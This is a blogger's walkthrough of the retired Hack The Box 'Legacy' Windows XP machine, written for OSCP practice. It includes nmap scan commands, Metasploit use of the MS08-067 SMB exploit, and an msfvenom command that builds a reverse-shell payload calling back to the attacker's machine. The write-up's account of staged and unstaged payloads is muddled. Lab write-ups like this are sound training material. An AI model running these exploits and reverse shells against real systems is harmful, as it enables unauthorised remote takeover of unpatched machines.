Hack The Box : Legacy Write-up #3

For my third blog, Since I have been pawning linux boxes, I have decided to move to windows and explore its complexity. I worked on a retired HTB Machine in reference to TJ Null guideline in preparation to OSCP.

Reconnaissance

As usual, I will start by scanning my target with nmap tool .

sudo nmap -A -p- 10.10.10.4

-A: Enable OS detection, version detection, script scanning, and traceroute

-p- : all ports from 0–65535 , you can exclude ephemeral ports by setting to -p T:range_start-range_end U:range_start-range_end

From the above snapshot , One can notice we have WinXP box running smb over tcp layer (Port 139 & Port 445). We will try and exploit the same.

Vulnerability Enumeration

We will now proceed to vulnerability enumeration, we will use common nmap scripts as shown below.

sudo nmap -Pn -n -sV — script vuln 10.10.10.4

Our target is vulnerate to CVE-2008–4250(smb-vuln-MS08–067) & CVE-2017–0143 (smb-vuln-ms17–010)

Exploitation w/ Metaspoilt:

windows/smb/ms08_067_netapi)

searching with MS08–067 , I found a corresponding exploit that can be used for RCE and It worked smoothly. set RHOSTS to your target and set RHOST as your attack machine. N.B: to get an interactive shell, I’ve used ‘execute -f cmd.exe -i -H ‘ , as a meterpreter command . Once inside the box, locate the flag and its done.

Exploiting w/o Metaspoilt :

I will use the same exploit “CVE-2008–4250 MS08–067”as I did with Metaspoilt. I will start off by downloading the the MS08_067 Python Exploit Script.

Now, we will have to upload the the payload to the exploit code which will be generated manually , which is done automatically within Metaspoilt framework. With the use of msfvenom tool, A shellcode will be generated as shown below.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.7 LPORT=4444 EXITFUNC=thread -b “\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40” -f c -a x86 — platform windows

Copy the generated shellcodes in the downloaded script, then run it as prescribed.

At this stage, we need a plan to catch the shell once a connection is established.

Note that the payload passed is unstaged, which will help in having an interactive shell. On the contrary when we use a staged shell, we will catch a shell which will die instantly. Considering the payload provided, it will form a staged payload , we will need metaspoilt multi handler exploit which I heard is allowed on the exam to engage with our target.

sudo ms08–067.py <target_ip> <os#> <port>

Below is what happens when we try to catch the shell from an staged payload running on a target.

We will proceed with waking the multi handler exploit from msfconsole, which will catch a shell after the establishment of the exploit on the target.

Afterwards, the Flags can be acquired after digging through the box.

Credits:

https://medium.com/@hakluke/haklukes-guide-to-hacking-without-metasploit-1bbbe3d14f90

Lesson Learned:

• Thorough understanding of msfvenom tool usage
• While installing some libraries of Python, Don’t use python3 as a command
• SMB not updated will result into a compromise of the device it is run on.